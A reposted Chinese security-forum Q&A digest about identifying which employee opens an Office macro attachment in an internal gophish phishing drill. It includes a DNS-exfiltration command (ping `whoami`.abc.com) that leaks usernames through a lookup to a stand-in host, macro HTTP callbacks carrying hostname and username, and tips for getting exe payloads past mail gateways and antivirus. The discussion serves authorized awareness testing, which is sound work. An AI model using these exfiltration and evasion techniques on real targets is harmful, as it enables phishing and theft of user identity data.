钓鱼邮件如何确定office附件宏的打开者身份?| 总第241周

admin 2024年4月16日03:37:05评论15 views字数 2515阅读8分23秒阅读模式
‍‍

‍‍

钓鱼邮件如何确定office附件宏的打开者身份?| 总第241周

0x1本周话题

话题:钓鱼邮件演练,office附件宏怎么确定是哪个人打开的?我用的gophish

A1:在宏里面加获取计算机信息的内容,宏里面带标识。

Q:那批量发送,每个宏都不一样吗?

A2:起个dnslog,把访问标识通过带进去就访问,一样的宏就行,比如运行命令ping `whoami`.abc.com,你在dnslog那边就能看到了。

Q:这个好像可以有,我们单位统一发的计算机,主机名都一样怎么办?

A3:如果是域内的话,肯定是用户名啊,用户名总不可能是一样的吧,再就是访问ip也可以判断,内网ip跟人做了绑定查一下就是了。叫你们的运维在域控下发策略修改,你不提需求,别人怎么知道你有需求。

A4:我也遇到过一些特殊场景,就是有的电脑没入域,没安装桌管,没安装dlp,没安装杀软,共用电脑。直接分享经验:如果有办法在目标电脑执行命令,就可以获取当前域用户名、foxmail用户目录、桌管日志、dlp配置、杀软配置、内网聊天工具配置、c:/users目录最新5个文件夹等,以上点正则就能提取出用户身份,重复出现两个以上的就是当前用户。纯cmd命令。

Q:那得安装agent吧。还有,如果是手机打开的怎么办呢?

A5:每个人都发内容一样,但链接不一样的邮件。或者宏里面调用一个HTTP请求访问,把主机名和用户名传过去,这样在Web服务器的Log就能看到了。

A6:http://公司/?token=一串每个人都唯一的加密值。这样能防爆破,防伪造,还能精准确认人员,邮件支持图片引用外链的,图片链接也可以用这种,这样能统计钓鱼邮件阅读数。

Q:主机名怎么可能都一样?同一网络内不能使用同一主机名。这是基操。

A7:我们好像发过来都是一样的。买的就是一样的 我们又没用域。

Q:这不是域的问题,你们主机难道不进行改名操作?这是啥情况。都是同一主机名的情况下,很难想象资产报告如何做。

A8:要域管才涉及到主机名吧。钓鱼邮件配合CanaryToken已经可以够了

A9:电脑还行,我们大多数人是手机接收的邮件。

A10:你这个钓鱼场景没想清楚,你要先固定好你的钓鱼场景和利用的方式才能搞,手机打开宏又没用,没有潜在的利用场景,所以就算手机打开又能怎么样。

A11:用ghost之类做的系统主机名就会一样吧,钓鱼场景下想区分用powershell调outlook相关的API应该能读出来用户名。

A12:ghost主机名是一样,但是加域的时候,写个脚本,把机器名改一下就好了,写个自动化加域的批处理,加域的时候自动执行改名操作。可以取登录用户名,也可以取网阿卡mac地址之类的,加域了应该不用写脚本了,域控会自动改的。

A13:主机名一改怕是应用和数据库集群会有问题。

A14:加域的时候改名字。

Q:GHOST不做OOBE,不改SID出来的系统能用吗?做了OOBE,主机名还会是一致的吗?

A15:IT那边做系统的时候是用的一键还原和一备份的模式,有点类似ghost,就是同型号的PC LAPTOP找个机器出来,做模板,然后就是PE下的一键备份工具直接全盘备份下来,然后后面同类型的机器直接一键还原。

A16:不管是哪种备份还原手段,只要是批量使用必须OOBE,不做OOBE,不改SID的系统内的运维直接开了算了。

A17:用dnslog把ip传过去是可行的,搞过。一种场景不能覆盖全部的,今年用表单填写,可以明年用exe,就是exe或者宏不做免杀会老被杀软干掉,登公司杀软后台直接加白样本。还要注意AC需要提前加白。自己从0搭,还是挺费劲的。

A18:不需要免杀的,你exe本身不做特定攻击行为,也就拉起一个HTTP请求就好了。此外,就算是被拦截了,杀软服务器端也可以看到哪些人执行了该程序,那么这也达成了统计目标。简单用py打包成exe,或者没有签名,十有八九是会被杀的,包括宏里vb获取信息去http get,行为也会被拦,倒是把信息放在域名请求里不大会被拦,试过360杀毒,如果是网络版统管放行另说了。

A19:宏搞完了,用ping访问hostname,dnslog记录不会被杀。你可以试试用vb去发起http,360杀毒会拦截的。

A20:我们测试的目的不是为了免杀。是为了统计。杀了有记录不就行了。

A21:钓鱼也得适用万一没统管杀毒的场景,如果杀软不能统一加白的话,那这种钓鱼的成本太高了,需要专项处理。

A22:经验就是如果想尽量精确,能够追踪,那么gophish还不太行

A23:我记得这个平台的rid并不绑定收件人,如果捣乱乱填,结果失真。我们还有另外一个搞笑的。用户A收到后,自己没点,把邮件转发给了他们小组,结果小组成员B点了。但是因为是用户A的RID,所以,统计结果算用户A的。

A24:嗯,不管哪种方式得把收件人信息写入投递的特征里用来追踪,这块只能自己想办法,收件人要跟用户填的东西或者收集的东西比对,尽量排除失真的数据。每家企业情况都不一样,适用方法也需要执行调整,大多数情况下,已经足够适用了。

Q:测试钓鱼邮件的时候,只要碰到exe附件就直接干掉怎么处理?我试过压缩、加密压缩,都给我干掉了。

A25:放到iso镜像里面,或者给个链接去下载,后端校验UA或者ip不能来自邮件网关。

Q:加密压缩,加密文件名也能识别到exe吗?

A26:自家公司可以白名单,在发邮件前一秒取消病毒文件拦截配置,发送,成功后即可恢复安全配置。意思是用甲方的方式可以实现,不用追求黑客的攻击方式,自家测试用poc,商业实战用exp。

A27:虽然不知道你的具体配置情况,但如果如你所述,邮件网关已经自动判定所有携带加密附件为恶意邮件,那么可以在EXE附件,EXE加密附件,EXE强加密附件测试这三项打勾勾了。可以直接忽略这个测试项,做下一个了。zip, 7zip, rar等其他压缩格式也都需要一一确认。

A28:直接excel宏不会被拦,但是默认宏不打开,估计效果不行。EXCEl宏是通过引导机制触发的。一直启用宏开关的估计稀少,如果宏用的不多,直接注册表关闭所有宏调用就一劳永逸了。

0x2

原文始发于微信公众号(君哥的体历):钓鱼邮件如何确定office附件宏的打开者身份?| 总第241周

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月16日03:37:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   钓鱼邮件如何确定office附件宏的打开者身份?| 总第241周https://cn-sec.com/archives/2658724.html

发表评论

匿名网友 填写信息